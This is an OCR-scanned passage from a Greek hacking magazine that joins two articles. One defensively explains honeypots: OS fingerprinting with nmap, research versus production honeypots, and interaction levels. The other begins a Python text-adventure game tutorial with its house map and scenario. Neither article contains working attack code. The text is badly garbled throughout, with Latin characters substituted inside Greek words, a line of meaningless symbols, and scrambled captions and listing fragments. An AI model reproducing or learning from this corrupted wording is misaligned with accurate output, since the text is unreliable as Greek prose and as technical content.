Αυτές οι εικονικὲς μηχανές, βέβαια, χρησιμοποιούν ειδικὀ λογισμικὀ και 
κατάλληλες ρυθμίσεις, ὥστε να μοιάζουν µε κἀποιο φυσικὀ σύστημα που 
θα εἰχαμε στο δίκτυο µας. Ένα καλὀ honeypot πρέπει να πείθει ότι ano- 
τελεί μηχάνημα µε μεγάλη αξία, ὥστε να προσελκύει τους επἰδοξους El- 
σβολεἰς. 


Ὅπως αναφέρθηκε προηγουμένως, κύριος σκοπὸς µας εἶναι να συγκε- 
ντρώσουµμε πληροφορίες. Αναρωτιέστε noc θα το πετύχουμε αυτό; Ta 
honeypots καταγράφουν αναλυτικἁ ὁλες τις επιθέσεις εναντίον τους. 
Πα παράδειγµα, αποθηκεύουν τη διεύθυνση IP rou attacker, τα ονόματα 
χρήστη και τους κωδικούς που χρησιμοποιεί, το εἶδος και την ἐκβαση της 
επίθεσης, τις εντολἐς που πληκτρολόγησε, τα αρχεία που τροποποίησε 
και πάει λέγοντας... 


Τρόπος λειτουργίας 


H δυνατότητα των honeypots να προσομοιώνουν διάφορα εἴδη συστημά- 
των οφεἰλεται στη χρήστη των λεγόμενων fingerprints. Αυτά ra «ano- 
τυπώματα» αποτελούν κατὰ κάποιο τρόπο ra μοναδικἁ στοιχεία ταυ- 
τοποἱησης που αφήνει κάθε λειτουργικὀ σύστημα. Αλλά ας πάρουμε τα 
πράγματα anó την αρχἠ. Όπως γνωρίζετε ἠδη, η δικτύωση ενὸς υπολο- 
γιστἠ γίνεται δυνατὴ µε τη χρήση της σουίτας πρωτοκόλλων TCP/IP (βλ. 


[Aukéc παγίδες! 
ri 


kai deltaHacker 004, σελ. 12). Ορισμένες παράμετροι rou TCP/IP --για 
την ακρίβεια οκτώ--, εἶναι μεταβλητὲς και ρυθµἱζονται anó το εκἁστοτε 
λειτουργικὀ σύστημα. Ως εκ τούτου, μπορούμε να διακρίνουμε διαφορε- 
TIKA λειτουργικά συστήματα, ὁπως και διαφορετικὲς εκδόσεις του ἰδιου 
λειτουργικού συστήματος, απὀ τις τιμὲς που χρησιμοποιούνται για τις 
συγκεκριμένες παραμέτρους rou TCP/IP. Όλες αυτὲς οι παράμετροι pači 
φτιάχνουν µια υπογραφή των 67bit ἡ αλλιὼς το λεγόμενο αποτύπωμα 
(fingerprint) του συγκεκριμένου λειτουργικού συστήματος. O δημοφιλὲ- 
στατος port scanner ονόματι nmap αναγνωρίζει τα διάφορα fingerprints 
και µε την παράμετρο -O μπορεἰ να µας ενημερώνει για το λειτουργικὀ 
σύστημα του στὀχου. E, λοιπὀν, καθὼς οι τιμές των διαφόρων αποτυπω- 
μάτων εἶναι γνωστές, τα honeypots τις χρησιμοποιούν για να υποδυθούν 
διάφορα λειτουργικἀ συστήµατα. Πέρα anó το ἰδιο το λειτουργικὀ σύστη- 
μα, τα honeypots εξομοιώνουν και διάφορες δικτυακὲς υπηρεσίες. Κατά 
κανόνα, αυτό επιτυγχάνεται µε ειδικἀ scripts, η συμπεριφορά των οποίων 
μιμείται εκείνη των αληθινών υπηρεσιών. Σκεφτεῖτε για παράδειγµα va 
Perl script το οποίο εκτελεἶται μονίμως στο παρασκήνιο, ακούει στη δι- 
κτυακἠ θύρα 21 του υπολογιστή κι απαντάει στα πακέτα που λαμβάνει 
ως ἑνας κανονικὸς FTP server. Ένα τέτοιο script θα μπορούσε va napa- 
πλανήσει τους επιτιθέµενους, κἀνοντάς τους να πιστεύουν ὁτι, πράγματι, 
an£vavri τους έχουν vav FTP server. 


Βασική διάκριση 


Θα μπορούσαμε va χωρἰσουμε τα honeypot σε δύο κύριες κατηγορἰες 
σύμφωνα µε το σκοπὀ που εξυπηρετούν -- ἡ τέλος πάντων τα κίνητρα 
που οδήγησαν στην υλοποἱησή τους. Με αυτή τη λογική, θα προέκυπταν 
οι κατηγορἱες των ερευνητικὠν honeypot kai των production honeypot 
(λέγονται και honeypot παραγωγἠς, av και το ελληνικὀ ὀνομα δεν ακού- 
γεται ωραία). 


Ta ερευνητικἁ honeypot εἶναι συστήματα µε πρωταρχικἠ αποστολἠ την 
καταγραφή ὁσο το δυνατὸν περισσοτέρων πληροφοριών, ὥστε να αυξά- 
νεται η γνώση µας γύρω απὀ τον τρόπο δράσης των blackhat (οι kakó- 
βουλοι hacker). Τα συγκεκριµένα honeypot προσομοιώνουν τις πιο δι- 
αδεδομένες υπηρεσίες, ώστε va εἶναι δελεαστικἁ και σχετικἁ προσιτά. 
Συνήθως υλοποιούνται σε ερευνητικἁ κέντρα, ὀπως πανεπιστήμια, KU- 
βερνητικὲς ἡ στρατιωτικές υπηρεσίες και οργανισμούς οι οποίοι ὅραστη- 
ριοποιούνται στο χώρο της ασφάλειας, ὁπως ro διεθνές Project Honeynet 
(www.honeynet.org). H λειτουργία των honeypot αυτής της κατηγορίας 
δεν έχει άμεση σχέση ue rnv ασφάλεια του ιδιοκτήτη τους. Βοηθάνε όμως 
στην ενηµέρωση και στην επαγρύπνηση των απανταχού ειδικὠν στην 
ασφάλεια. 


Ta honeypot παραγωγἠς δεν στοχεύουν στη γενικότερη απὀκτηση yvo- 
σης, γύρω απὀ τη δράση των κακὀβουλων hacker. Αυτά xouv ως κύρια 
αποστολἠ την προστασία του ιδιοκτήτη τους. Τοποθετούνται συνήθως 
στο τοπικὀ Oikruo µιας εταιρείας ἡ ενὸς οργανισμού και, ὁπως όλα τα 
honeypot, προσπαθούν να τραβήξουν την προσοχή των επιτιθἐµενων. 
Από τις πληροφορίες που συγκεντρώνουν, οι διαχειριστἐς της εκάστοτε 
εταιρίας μπορούν va πληροφορηθούν για τυχὸν αδυναμἰες που υπάρχουν 
στα κανονικἁ τους συστήµατα, ὁπως επἰσης και για τις τεχνικὲς που ava- 
πτύσσουν οι επιτιθἐµενοι ἐναντι των συστημάτων της εταιρἰας. 
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Παράδειγμα 

τυπικἠς αρχιτε- 

κτονικἠς ενός 

τοπικού δικτύου, net A 
TO ΟΠΟΙΟ ενσωµα- 

τώνει honeypot. Οἱ ; 

παγίδες ἔχουν To- 


ποθετηθεί ανάμεσα 
σε πραγµατικἁ Attacker 
μηχανήματα... 


Web Server 


Mail Server 


Honeypot Honeypot 


Honeypot 


Επίπεδο αλληλεπίδρασης 


Πέρα anó το διαχωρισμό µε βάση την αποστολἠ, ra honeypots χωρἰζο- 
νται και ως προς το επἰπεδο αλληλεπίδρασης που επιτρἐπουν στον εισβο- 
λέα ν΄’ αναπτύξει μαζί τους. Τα επίπεδα αυτἠς της αλληλεπίδρασης εἶναι 
τρία: Χαμηλό, μέτριο και υψηλό. Επομένως, ως προς αυτό το κριτήριο τα 
honeypots χωρίζονται σε τρεις ομάδες. Αυτός ο διαχωρισμός παρουσιάζει 
το μεγαλύτερο ενδιαφέρον, εφόσον η αξία ενὸς honeypot τελικά σχετἰζε- 
ται µε TO τι µπορεί να κάνει πάνω του ἑνας επιτιθἐµενος. 


ο Χαμηλής αλληλεπίδρασης. Αυτά τα honeypots προσομοιώνουν 
υπηρεσίες που δεν μπορούν να χρησιμοποιηθούν απὀ τον εισβο- 
λέα, ὡστε να αποκτήσει πλήρη πρόσβαση στο ἰδιο το honeypot. 
Αποτελούν δηλαδἠ πλήρως ελεγχόμενα περιβάλλοντα, στα onoia 
o επιτιθἐµενος δεν θα αποκτήσει ποτὲ πλήρη πρὀσβαση. Σε va 
τέτοιο honeypot δεν υπάρχει πραγματικὀ λειτουργικὸ σύστημα, µε 
το οποίο αλληλεπιδρά ο εισβολέας. Ο επιτήδειος χάκερ αλληλεπι- 
δρἀ µόνο µε ἑνα πρὀγραμμα, το οποίο εξομοιώνει τη συμπεριφορά 
κάποιου λειτουργικού συστήματος. Το γεγονὸς αυτό διευκολύνει 
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τη γρήγορη κι ασφαλἠ ανάπτυξη πολλών honeypots σε va τοπι- 
KÒ δίκτυο. Συνήθως χρησιμοποιούνται για καταγραφή αυτοματο- 
ποιημένων επιθέσεων ἡ της δράσης διαφόρων Internet worms. Πα 
παράδειγμα, ¿va honeypot αυτἠς της κατηγορίας μπορεί va προσο- 
μοιώσει ἑνα μηχάνημα µε Windows Server 2003, στο οποίο τρέχει 
η υπηρεσία Telnet. Ένας hacker µπορεί va συνδεθεἰ στον Telnet 
server kai va δει το σχετικὀ banner, απὀ το οποίο θα μάθει το λει- 
τουργικὀ σύστημα. Κατόπιν, θα ἐχει μπροστά rou ἑνα login screen, 
στο οποίο θα µπορεί να δοκιμάσει ¿va brute force attack ἡ οποιαδἠ- 
ποτε ἄλλη τεχνικὴ γνωρίζει. Φυσικά, όλα ὁσα κάνει θα καταγρἀφο- 
νται ανελλιπώς απὀ ro honeypot! O θύτης ἐχει γίνει θύμα -- και δεν 
TO 'χει πάρει καν εἰδηση! Τη στιγμὴ που νομίζει ὁτι επιτίθεται σε ἑνα 
σύστημα µε Windows Server 2003 και συγκεκριµένα στην υπηρεσία 
Telnet, στην πραγματικότητα μιλάει u’ ἑνα Python script το onoio 
ενδέχεται να τρέχει σε Debian ἡ σε κάποια ἄλλη διανομὴ Linux... 


ο Μεσαίας αλληλεπίδρασης. Όπως θα περίμενε κανεὶς, τα 
honeypots αυτής της ομάδας εἶναι πιο ανεπτυγμένα anó τα npo- 
ηγούμενα. Βέβαια, ὁπως κι εκείνα της χαµηλἠς αλληλεπίδρασης, 
δεν τρέχουν κάποιο πραγματικό λειτουργικὀ. Ωστόσο παρέχουν nE- 
ρισσότερες υπηρεσίες, προσφέροντας περισσότερους στόχους στον 
επιτιθέµενο, ενώ εκτελούν και πολλὰ scripts τα οποία εξοµμοιώνουν 
ἑνα ολόκληρο λειτουργικὀ σύστημα. Έτσι, αυτά τα honeypots Ka- 
ταφέρνουν αν καταγράψουν περισσότερα στοιχεία της δράσης των 
κακὀβουλων χάκερ. Σκεφτεἰτε για παράδειγµα £va script, το onoio 
ανοίγει τη θύρα της υπηρεσίας SSH και περιμένει συνδέσεις. Au- 
τὸς ο υποτιθέμενος SSH server θα εἶναι σχετικἁ εὐκολο va «σπά- 
σει», καθώς θα ἐχουμε φροντίσει να αναγνωρίζει σχετικἀ εὐκολα 
password. O επιτιθἐµενος, λοιπὀν, μετὰ anó éva dictionary attack 
(n.x., ug το THC-Hydra), θα νομίζει ότι κατάφερε va ouvós8si στο 
σύστημα. Έτσι, θα αρχίσει να ro ψαχουλεύει και να αναζητά τρὀ- 
πους να αποκτήσει root access. Φυσικά, το script θα συνεχίσει va 
αποκρἰνεται στις εντολὲς του εισβολέα, σαν ὀντως να υπήρχε κἀ- 
ποιο αληθινό λειτουργικὀ. Την ἴδια στιγμή, φυσικἀ, θα καταγράφει 
τα πάντα! Αλήθεια, δεν θα εἶχε πλάκα να παρακολουθούσαμε τη 
μάταιη προσπάθεια κάποιου, να καταλάβει ἑνα σύστημα που στην 
πραγματικότητα δεν υπάρχει; :D 


ο Ὑψηλής αλληλεπίδρασης: Πρόκειται για τα πιο ανεπτυγμένα 
honeypots. Αποτελούν αρκετά πολύπλοκα συστήµατα, ra onoia 
σχεδιάζονται µε μεγάλη προσοχὴ και δεν xouv καμία σχέση µε 
εκεἰνα των προηγούμενων ομάδων. Αυτά ra honeypots δεν τρέχουν 
κάποια scripts που εξομοιώνουν τη συμπεριφορά ενὸς λειτουργικού 
ἡ κάποιων υπηρεσιών, αλλά éva κανονικὀ λειτουργικὀ! Συγκεκριμὲ- 
να, εκτελούν va επιτηδευμένα rporó σύστημα -- ἡ ἑνα κανονικὀ 
σύστημα µε επιτηδευµένα τρωτὲς υπηρεσίες. Έτσι, αν τα καταφέἑ- 
ρει, o επιτιθἐµενος µπορεἰ va το καταλάβει ολοκληρωτικά! Όπως 
καταλαβαίνετε, το γεγονὸς αυτὸ ἐχει ἑνα μειονέκτημα: Αν δεν αντι- 
ληφθούμε εγκαϊρως ὁτι το σύστημα ἐχει καταληφθεί, ενδέχεται 
να χρησιμοποιηθεί για ἄλλες, πραγματικὲς επιθέσεις. Πάντως, ra 
honeypots αυτής της ομάδας ¿xouv κι ἑνα πολὺ σημαντικὀ προσὸν: 
Εφόσον εκτελούν ἑνα kavovikó λειτουργικὀ σύστημα, παρέχουν και 
το μέγιστο βαθμό καταγραφἠς ὁλων ὁσων µπορεἰ να κάνει ἑνας 
επιτιθέμενος. Σκεφτείτε για παράδειγµα ἑνα μηχάνημα στο Oikruó 
μας, το οποίο τρέχει κἄποια παλιὰ ἐκδοση, κάποιας διανοµἠς Linux. 
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Ὅπως φαντάζεστε, anó αυτὸ το σύστημα θα λείπουν όλα τα κρἰ- 
oia patches, evo θα προσφἑρει αρκετὲς υπηρεσίες ὥστε va εἰναι 
ελκυστικὀ. lia την καταγραφἠ των γεγονότων, αυτὸ το σύστημα 
μπορεὶ να χρησιμοποιήσει ἑνα κατάλληλο kernel module, ὥστε n 
δουλειὰ να γίνεται αθόρυβα. Ένας επιτιθἐµενος µε βασικὲς yvo- 
σεις θα µπορεἰ v' αποκτήσει πλήρη πρόσβαση σ’ αυτὸ το σύστημα 
σχετικἁἀ γρήγορα. Από "kei κι ύστερα, θα µπορεἰ va κἀνει paci του 
οτιδήποτε θέλει. Προφανώς, ὁμως, δεν θα θέλαμε να επιτεθεἰ και 
στα υπόλοιπα μηχανήματα του δικτύου µας. Ακριβώς γι’ αυτό, ἑνα 
honeypot αυτής της ομάδας πρέπει να τοποθετείται µε npoooyr| 
μέσα στο δἰκτυό µας. 


Η αξία των honeypots 


Τα honeypot ἐχουν πολλὲς εφαρμογές, απὸ τις οποίες προκύπτει και η 
µεγάλη τους αξία. Όπως αναφέρθηκε, τα production honeypots βοηθούν 
µια εταιρεἰα ἡ £vav οργανισμὸ στον αμυντικὀ σχεδιασμό της. Τα ερευνη- 
τικἀ honeypot, anó την ἄλλη, συγκεντρώνουν πληροφορἱες και στοιχεία 
για το σύνολο των κακόβουλων hacker και βοηθούν το σύνολο των φιλἠή- 
συχων διαχειριστών. 


Στη λίστα µε τα πλεονεκτήματα των honeypots περιλαμβάνεται το ὁτι 
μπορούν να υλοποιηθούν σχετικἁ εύκολα μέσα σε ἑνα δίκτυο (µε εξαἰρε- 
ση τα υψηλής αλληλεπίδρασης που θέλουν κάποιον σχεδιασμό), καθὼς 
και µε αρκετὰ μικρὸ κόστος. (Πολλὲς φορὲς αρκεἰ ἑνας µόνο υπολογι- 
στἠς, για να προσομοιώσει πολλά ἄλλα συστήματα.) Αναλόγως του πού 
τοποθετείται ἑνα honeypot εξυπηρετεί διαφορετικὲς μορφές ανίχνευσης, 
ενώ ως δικτυακἠ συσκευἠ δεν παράγει καθόλου «θόρυβο» και δεν επι- 
βαρύνει το τοπικὀ δίκτυο. Κάθε δεδομένο που καταγράφει £va honeypot, 
εἶναι κατὰ πάσα πιθανότητα χρήσιμο. 


Υπάρχουν βέβαια και μειονεκτήματα. Σε αυτά περιλαμβάνεται το ygyovóg 
ὁτι καταγράφουν µόνο οτιδήποτε κατευθύνεται αποκλειστικἁ εναντίον 
τους και τίποτα ἄλλο. Ἔτσι, θα μπορούσαν κάποια πραγματικἁ συστήματα 
του δικτύου µας va παραβιαστούν, ενώ ra honeypot να μένουν ἁθικτα 
και να µην προσφέρουν τίποτα. Επιπρόσθετα, κάποια anó τα πακέτα λο- 
γισμικού που χρησιμοποιούνται για την προσομοίωση υπηρεσιών δεν εἰ- 
ναι τόσο καλοφτιαγμένα, ὁσο θα ὀφειλαν. Έτσι, ἑνας ἐμπειρος εισβολέας 
μπορεί να καταλάβει ὁτι έχει πέσει σε honeypot. 


Τελικά, ὁπως συμβαίνει µε τα περισσότερα συστήματα ασφαλείας, η χρή- 
ση των honeypot προὐποθέτει καλή μελέτη και σωστή οργάνωση rou 
αμυντικού µας σχεδίου. 


H συναρπαστικἠ συνέχεια, εντός! 


Ελπίζουμε η ιδέα των honeypots va κέντρισε το ενδιαφἑρον σας. Πολύ 
πιθανὀ va σας μπήκαν ἠδη ιδέες, για το στήσιμο και τη µελέτη των δικών 
σας honeypots! Έχετε κατὰ vou Ori το ν΄ ανοίξουμε την πόρτα στους 
κακόβουλους hacker εἶναι εὖκολο και pnopei να αποδειχθεἰ ιδιαίτερα εν- 
διαφέρον ως εγχείρημα, ταυτόχρονα όμως *kari* επικἰνδυνο, ενίοτε και 
καταστροφικὀ. Εμεὶς πάντως αγαπάμε τη γνώση και θα ρισκάραμε πολλά 
για να την αποκτήσουμε. Μ΄’ ἆλλα λόγια, δεν θέλουμε να σας αποθαρρύ- 
voug, οφείλουμε ωστόσο va επιστήσουµε την προσοχἠ σας! Και μετὰ 
anó τις απαραίτητες προειδοποιήσεις, νομἰζουμε ὁτι εἶναι opa va διαβά- 
σετε το άρθρο που αρχίζει απὀ τη σελἰδα 78. 


Εσείς τι δικαιολογία έχετε που η διαφήμισή σας απουσιάζει από εδώ; 


Τολμήστε να µας την πείτε από το talk2us(jdeltahacker.gr. Όπως και να χει θα 
επικοινωνήσουμε κι εμείς µαζί σας - ή έστω µε τον ανταγωνιστή σας ;) 
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Το πρώτο άρθρο της σειρᾶς µας, που δημοσιεύτηκε στο 
| deltaHacker 005, ἦταν µια µικρή εισαγωγἠ στον κόσμο της 
Python και στον προγραμματισμὀ. Πιο πολύ βέβαια ἦταν µια | 
| συνειδητή προσπάθεια απὸ μέρους µας va σας ὠθήσουμε | 
υποσυνεΐδητα στον προγραμματισμό. Θυμηθείτε: κάθε φορά ! 
| που τρέχετε va npóypappa στον υπολογιστή, εκτελεῖτε κἄτι 
που δημιουργήθηκε anó κάποιον ἄλλο. Γιατί λοιπόν να µην 
| αρχίσετε να εκτελεῖτε πράγματα που ¿xouv δημιουργηθεἰ 
απὸ εσάς; Αν ο υπολογιστής εἶναι µια προγραμματιζόµενη 
| μηχανὴ γενικής χρήσης, γιατί πρέπει εμείς va αφήσουμε ro 
«προγραμματιζόμενη» αποκλειστικά στους ἄλλους; Μήπως 
k εἶναι καλύτεροι anó εμάς; 
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Δεν σας κρύβω Ori όλοι οι εμεὶς που ξεκινήσαμε πολύ παλιά τον npoypap- 
ματισμὸ, εἰχαμε τα πλεονεκτήματα της αμεσότητας kai της απλότητας 
των μηχανημάτων. Επίσης, δεν εἰχαμε και τίποτα ἄλλο va κἄνουμε µε 
αυτά! Εξ αρχἠς, εδὠ nou τα λέμε, τα εἰχαμε αγοράσει για να μάθουμε 
προγραμματισμὀ. Τώρα, όμως, μέσα στην υπερπληθώρα πληροφοριών 
και παροχών της τεχνολογίας, or υπολογιστὲς συχνὰ υποβιβάζονται σε 
απλὲς συσκευές. Έχουμε ὁλοι γυρίσει στα ἐτοιμα πράγματα, ενώ ἐχου- 
µε και σηµαντικἀ νέα πλεονεκτήματα: Γρήγορα μηχανήματα, τεράστιες 
μνήμες, αφθονία ελεύθερων γλωσσών προγραμματισμού και φυσικά TO 
Internet. Φαίνεται ὁμως ὁτι η αφθονἰα μερικὲς φορὲς βλάπτει. Ευτυχώς 
υπάρχει η Python -- και φυσικά αυτὸ το TITANOTEPAZTIO περιοδικὀ nou 
κρατάτε στα χέρια σας :Ώ Έτσι, θα φέρουμε κάτι anó αυτή τη χαμένη 
αμεσότητα πἰσω, γράφοντας τα παλιὰ, καλά παιχνίδια -- αλλά στις σύγ- 
χρονες εκδοχὲς τους. Τα πλεονεκτήματα θα εἶναι πολλὰ. 


ο Oa μάθετε να σκέφτεστε σαν προγραμματιστής. (Βασικά, θα μάθε- 
τε να σκέφτεστε. Τελεία.) 


ο Θα μάθετε λίγη Python και αρκετἠ py-game, yia να συνεχίσετε 
να γράφετε δικἀ σας παιχνίδια και παραλλαγές αυτών που θα σας 
δείξουμε. 


ο Θα κολλήσετε τόσο άσχημα µε τον προγραμματισμὀ, που θα μὲ- 
VETE όλη μέρα σπίτι σας, δεν θα απαντάτε στο τηλέφωνο και θα 
τρἐφεστε αποκλειστικἀ µε πἰτσες, καφέδες και αναψυκτικά τύπου 
κόλα. 


ο OK, ro τελευταίο ἰσως δεν εἶναι ιδιαϊτερα καλό αλλά εἶἰμαστε σίγου- 
po! óri µπορείτε va ro ελἐγξετε. (Σ.Ε. Ki αν το κάνετε, µην ξεχάσε- 
τε να µας ngire nog το πετύχατε :D) 


Πριν συνεχίσετε να διαβάζετε το παρὸν άρθρο, σας καλούμε να διαβάσετε 
το άρθρο 1.5, στο site του περιοδικού: http://deltahacker.gr/?p-4170 


Αν έχετε λύσει τις ασκήσεις, µπορείτε va συγκρἰνετε τις λύσεις σας µετις 
δικὲς µας. Θα πρέπει επἰσης να το διαβάσετε προσεκτικἀ, καθὼς κάνουμε 
µια εισαγωγἠ στις λίστες και δείχνουμε ακόµα μερικἁ βασικὰἁ για την if και 
τη for, τις οποίες θα χρησιμοποιήσουμε ἆμεσα. 


The Adventure 


Μη σας Φαίνεται απἰστευτο. To δεὐτερὀ µας παιχνίδι --αισθητά μεγαλύτε- 
po απὀ ro «number guess»-- εἶναι ἑνα παιχνίδι περιπέτειας. Όχι µη πάει 
ο νου σας σε κάτι µε τρισδιάστατα γραφικἀ τύπου Final Fantasy. (Αυτὸ 
θα ro γράψετε εσείς, μετά ro ...part 999, στο περιοδικὀ.) 'Eva adventure, 
στην απλούστερη του µορφή περιέχει μόνο κείμενο. Τα λεγόμενα text 
adventures ἦταν πολύ της μόδας πριν μερικὲς δεκαετίες. Βλέπετε, 
υπήρχαν τότε υπολογιστὲς που --όσο σοκαριστικὀ και αν ακούγεται auTÓ- 
- δεν μπορούσαν να δείξουν παρά µόνο κείμενο στις οθόνες τους! Αλλά 
και εκεἰνοι που μπορούσαν να δείξουν γραφικά, e, δεν ἦταν ακριβώς και 
φωτογραφικής ποιότητας. Σε κάθε περίπτωση, επειδἠ ο προγραμματιστής 
δεν ἦταν απαραίτητα και γραφίστας, τα text adventures κυριαρχούσαν. 


H ιδέα nico απὀ éva text adventure εἶναι ότι ο παἰκτης ξεκινάει σε ἑνα 
δωμάτιο. O υπολογιστής τυπώνει µια περιγραφἡ του χώρου µε TIG πιθα- 
νὲς εξόδους (πὀρτες, σκάλες κ.λπ.) κι ο παίκτης αποφασίζει την επόμενη 
του κἰνηση. Όταν εισέρχεται σε ἑνα νὲο δωμάτιο η διαδικασία επαναλαμ- 
βάνεται, μέχρι εἰτε ο παίκτης να κερδίσει (n.x., να βρει το αντικείµενο 


Python games: programming xshouldx be fun! 
ΓΚκἩΜἩΜκἠκἠκἠκἐκἐκ!κκὄκὄκἄ6ᾖκκκπἅ6ἁ«ὥὋὥὤὝἙἳἅαοαοἒἵ“ἳ͵Ψ͵ΨΝκ«κΗ“κκΜκΜκΜκΜΗΜΨΜΨΜΨΜἩἤΜΨΜ|ΜΓΠ“ἄ“᾿κκᾱὙκακκκκ“““α“ά 


που εἶναι ο στὀχος του παιχνιδιού, να φτάσει στο κατάλληλο δωμάτιο 
κ.ο.κ) εἶτε να χάσει (π.χ., να τον πιάσει το τέρας, το alien ἡ η μαμά του 
-- που ορισμένοι θεωρούν χειρότερο τέλος και απὀ ro alien). Σε μερικά 
adventures υπάρχουν περισσότεροι απὀ ἑνας τρόποι yia να κερδίσει κα- 
νεὶς και σίγουρα υπάρχουν πολλοἰ τρόποι να χάσει! Σε πιο εξελιγμένες 
μορφές, ¿va text adventure απαιτεἰ anó τον χρήστη να συλλέγει αντι- 
κείμενα, τα οποία θα χρειαστεἰ σε ἄλλα δωμάτια. Φυσικά, ο παἰκτης ἐχει 
στη διἀθεσἠ του περισσότερες εντολὲς για να εκπληρώσει το σκοπὀ του 
παιχνιδιού. 


To adventure nou θα γράψουμε εμεὶς βασίζεται στο πρωτότυπο nou EIXE 
δηµοσιευθεἰ στο άρθρο «Παιχνίδια Περιπέτειας» του Στάθη Ευθυμίου, 
στο περιοδικὀ Pixel τον Ιανουάριο rou 1986! Χρησιμοποιούμε τον ἰδιο 
χάρτη και τις πρωτότυπες περιγραφὲς των δωματίων, αλλά Φυσικά το 
γράφουμε σε Python κι ὀχι σε BASIC. Και για ὁσους δεν το ξέρουν, το 
Pixel τότε ἦταν ἑνα περιοδικὀ σαν το σημερινὀ deltaHacker! (Σ.τ.Ε. Τις 
ευχαριστίες µας, αγαπητὲ συνάδελφε και φίλε, ro Pixel ὁμως ἦταν απλά 
ΘΕΙΚΟ και κανένα ἄλλο περιοδικὀ δεν το ἑφτασε, ever.) 


TI BASIC READY 


OLD CS1 
* PRBAMPRESSSENFER TAPE csi 
* PRERSeRESSEZAFeR AY csi 
3 RERDING 


v *Qvk« 


Εικόνα 2 

Ένα μικρὀ κομμάτι 
απὀ ro listing του 
αρχικού προγρἀμ- 
ματος Adventure 
(© 1986)! Φαί- 
νεται επίσης και 

η εκτέλεση του 
προγράµµατος, 
όπου βλέπετε πως 
δέχεται κατευθύν- 
σεις του τύπου 1, 
2, 3, 4. 


ERS 
c202020 


;"0010284444 
€151."0039844447C 
> “0039444444 


^ ARMO DOD M «00x 


Mo ZA ^ 
ὦ QO^- Om ^e KTEREM 


$OROBRODOZOOZOTO- ommmmmm: 


PIODNJDNJ:0120:02423 223: 


Εικόνα 1 

To μηχάνημα στο 
οποία έγραψα 

--το 1986-- την 
πρώτη έκδοση 

του προγρἀμμα- 
τος που φαίνεται 
στο άρθρο. Ναι, 

το ξέθαψα απὀ 

την ντουλάπα και 
το φόρτωσα για 
χάρη σας! (Από την 
κασέτα, όπως pai- 
νεται δεξιά, μέτα 
απὀ 26 χρόνια!) Kai 
ναι, δουλεύει ακὀ- 
μα. Βλέπετε και τις 
σελίδες rou Pixel, 
HE TO αντίστοιχο 
θέµα. 
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όμως και η μηχανή 
που παρουσιάζου- 
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εσείς μπορείτε 

να φτιάξετε £vav 
οσοδήποτε μεγάλο 
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Δεν σας κρύβω ὁτι διαβάζοντας ro ἀρθρο, εἶχα αρχίσει να σκέφτομαι πώς 
θα μπορούσα να ro υλοποιήσω στον τότε υπολογιστή µου. Υπήρχε βέβαια 
£va listing σε BASIC στο περιοδικὀ, αλλά εκτός ότι δεν ἦταν συμβατὸ με 
το δικὀ µου μηχάνημα (που βλέπετε στις εικόνες), χρησιμοποιούσε και µια 
λογική που δεν µου ἀρεσε ιδιαίτερα. Ἡμουν σίγουρος ὁτι μπορούσα να 
βρω µια προγραμματιστικἁ πιο ωραία λύση, και πράγματι πἐρασα μερικὲς 
μέρες σκεπτόμενος το πρόβλημα σαν ἑνα background task στο μυαλό 
µου (κατανἁλωνε αρκετοὺς πόρους, πάντως). Ἑνα βράδυ πετάχτηκα απὀ 
το κρεβάτι ἐχοντας την απάντηση που χρειαζόμουν! H πρώτη ἐκδοση εἰχε 
γραφτεί μέχρι το npol... 


O ἰδιος αυτός τρόπος --αλλά προσαρµοσμένος στα δεδοµένα της Python-- 
παρουσιάζεται £00. Όπως θα διαπιστώσετε κατανοώντας το πρόγραμμα, 
πρὀκειται ουσιαστικά για µια μίνι μηχανὴ περιπέτειας, καθώς µπορείτε να 
αλλάξετε τα δεδοµένα µέσα στο πρὀγραμμα και να δημιουργήσετε µια 
διαφορετικἠ. 


Ο Χάρτης 


Βασικό σημείο στα text adventures εἶναι ο χάρτης που δεἰχνει όλα ra δω- 
μάτια kai τους τρόπους σύνδεσης / επικοινωνίας μεταξύ τους. Το χάρτη 
αυτό θα πρέπει να rov φτιάξετε πριν αρχίσετε να γράφετε την περιπέτεια 
σας. Φυσικά, θα ἐχετε σκεφτεἰ και κἄποιο συναρπαστικὀ σενάριο για την 
περιπἑτειὰ σας, ὥστε av µη τι ἆλλο να ἐχετε τις κατάλληλες περιγραφέἑς 
για το κάθε δωμάτιο. Γεγονὸς εἶναι ὁτι επειδἠ θα έχετε γράψει εσεἰς την 
περιπέτεια, μάλλον θα σας εἶναι εὐκολο και να την κερδίσετε. Αλλά δεν 
πειράζει, θα nai&ouv και οι φίλοι σας. O δικὀς µας χάρτης παραμένει ni- 
OTÓG στο αρχικὀ ἀρθρο και εἶναι αυτὸς που φαίνεται στην εικὀνα 3. 


Πρὀκειται προφανὼς yia ἑνα μικρού μεγέθους adventure (αλλά µπορείτε 
με την ἴδια μηχανὴ να φτιάξετε ¿va ògo μεγάλο θέλετε) και διαδραματἰ- 
ζεται σε ἑνα σπἰτι µε τα παρακάτω δωμάτια /χώρους: 


Αριθμός a 


[o0 | kms | 


-— 


1 μα 
Μπάνιο 


Χωλ 


4 - Καθιστικό 


5 - Σαλόνι 


6 
Τραπεζαρία 


* 


T 
Aas M 8 - Κουζίνα 


Διάδρομος 


aai 
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12 
Δικό µας 


«Διαδ. 


5 


Επάνω διάδρομος 
Δωμάτιο Αδερφού 


11 - Γονέων 


A (3) 


> A (2) 


AIKÒ µας δωμάτιο 


Python games: programming xshouldx be fun! 
ji 


Δώστε ἐμφαση στο γεγονὸς ὁτι έχουμε κωδικοποιήσει τα δωμάτια µε 
αριθμούς απὀ ro 0 ως το 12. Αυτό θα το χρησιμοποιήσουμε φυσικά στο 
πρὀγραμμα -- και θα µας διευκολύνει πάρα πολὺ. 


Το Σενάριο 


O αρχικός συγγραφέας ονόμασε auró ro παιχνίδι «Νυχτερινή Περιπέ- 
τεια». Με απλά λόγια, το σενάριο εἶναι το παρακάτω: Eiore ἑνας μαθητὴς, 
μέλος µιας οικογένειας µε αυστηρές n8ikég αρχές. (Ξέρετε, απὀ αυτὲς 
nou τα παιδιά γυρίζουν πριν τους γονεὶς στο σπίτι. Δηλαδή πριν vuxTO- 
σει, όχι πριν ξημερώσει.) Έχετε βγει κρυφὰ τη νύχτα (!) και ropa πρέπει 
να επιστρέψετε στο σπίτι, στο δωμἀτιὀ σας, χωρὶς να σας αντιληφθεί 
κανείς. Θα πρέπει να αποφύγετε τον πατέρα σας, τη μητέρα σας αλλά και 
TOV αδερφὸ σας, ο οποίος εἶναι μαρτυριάρης και θα τα πει όλα! H µητέ- 
